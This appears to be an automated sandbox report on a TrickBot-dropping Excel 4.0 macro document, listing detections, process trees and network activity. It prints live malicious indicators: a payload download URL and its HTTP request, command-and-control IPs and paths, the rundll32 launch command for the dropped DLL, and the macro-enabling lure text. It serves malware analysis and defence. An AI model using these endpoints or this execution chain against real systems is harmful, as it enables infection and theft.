Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055 (renamed file extension from 7055 to xls)
Analysis ID:355602
MD5:422030b616989ef7bf2f56a2f266068f
SHA1:04ec47e9f08ed7e4861c6f252a381faee4283bf9
SHA256:6f1c23f3d7e471cf0c4a91f59c94853128413b84065ef42ad2065337b973beab

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2340 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2548 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2424 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2316 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2344 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.2087111126.0000000000374000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000003.2087119613.0000000000374000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2091202267.0000000000340000.00000004.00000020.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        00000004.00000002.2091126228.0000000000270000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          00000004.00000002.2091382187.0000000000968000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.270000.1.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.270000.1.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2340, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 2548

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://www.chipmania.it/mails/open.phpAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted fileShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsReversingLabs: Detection: 25%
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0 CryptAcquireContextW,

                Compliance:

                barindex
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2092317965.000000006E8A9000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,

                Software Vulnerabilities:

                barindex
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 8[1].jjkes.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx edx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc dword ptr [esp+40h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ecx, word ptr [eax+02h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx eax, byte ptr [ebx]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc edx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ebx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ebx, edx
                Source: global trafficDNS query: name: www.chipmania.it
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 200.52.147.93:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.22:49166 -> 200.52.147.93:443
                Source: TrafficSnort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49167 -> 142.202.191.164:443
                Source: TrafficSnort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.22:49169 -> 193.8.194.96:443
                Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49169
                Source: Joe Sandbox ViewIP Address: 185.81.0.78 185.81.0.78
                Source: Joe Sandbox ViewIP Address: 200.52.147.93 200.52.147.93
                Source: Joe Sandbox ViewASN Name: RedesyTelecomunicacionesHN RedesyTelecomunicacionesHN
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: unknownDNS traffic detected: queries for: www.chipmania.it
                Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: wermgr.exe, 00000006.00000002.2361153381.00000000335D0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: wermgr.exe, 00000006.00000002.2362129186.00000000341A0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: wermgr.exe, 00000006.00000002.2361153381.00000000335D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: wermgr.exe, 00000006.00000002.2356089312.000000000026E000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2356106081.000000000029A000.00000004.00000020.sdmpString found in binary or memory: https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/
                Source: wermgr.exe, 00000006.00000002.2356089312.000000000026E000.00000004.00000020.sdmpString found in binary or memory: https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/=
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

                System Summary:

                barindex
                Found malicious Excel 4.0 MacroShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsInitial sample: urlmon
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above I . . . . . E' 15 16 Once you have enabled editing
                Source: Screenshot number: 4Screenshot OCR: Enable content button 'Yuts S," " from the yellow bar above :: "";"" " 6~_ 22 23 24 25 26 2
                Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
                Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 1Screenshot OCR: Enable content button from the yellow bar above j'
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B470 NtDelayExecution,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,CloseHandle,HeapFree,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00078CA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E0F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00068010
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077840
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00080870
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000644C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000790E0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000714F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061500
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076100
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076D10
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00072580
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000789B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00069200
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CA00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BE20
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077630
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CE70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006A280
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006C290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006CEB0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B700
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073B00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E310
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00062720
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00075F70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000763A8
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000717B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00120040
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Joe Sandbox ViewDropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                Source: rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@9/7@3/2
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\3ECE0000Jump to behavior
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{3911DBC3-3842-26B4-C41F-452645FC2FA1}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC11C.tmpJump to behavior
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\wermgr.exeSystem information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsReversingLabs: Detection: 25%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2092317965.000000006E8A9000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00811BD0 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00811C7A push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00811CFD push dword ptr [edx+14h]; ret
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007D0F0 push 8B48D233h; iretd
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                Source: C:\Windows\System32\wermgr.exeFunction Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,handleClosed,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened
                Tries to detect virtualization through RDTSC time measurementsShow sources
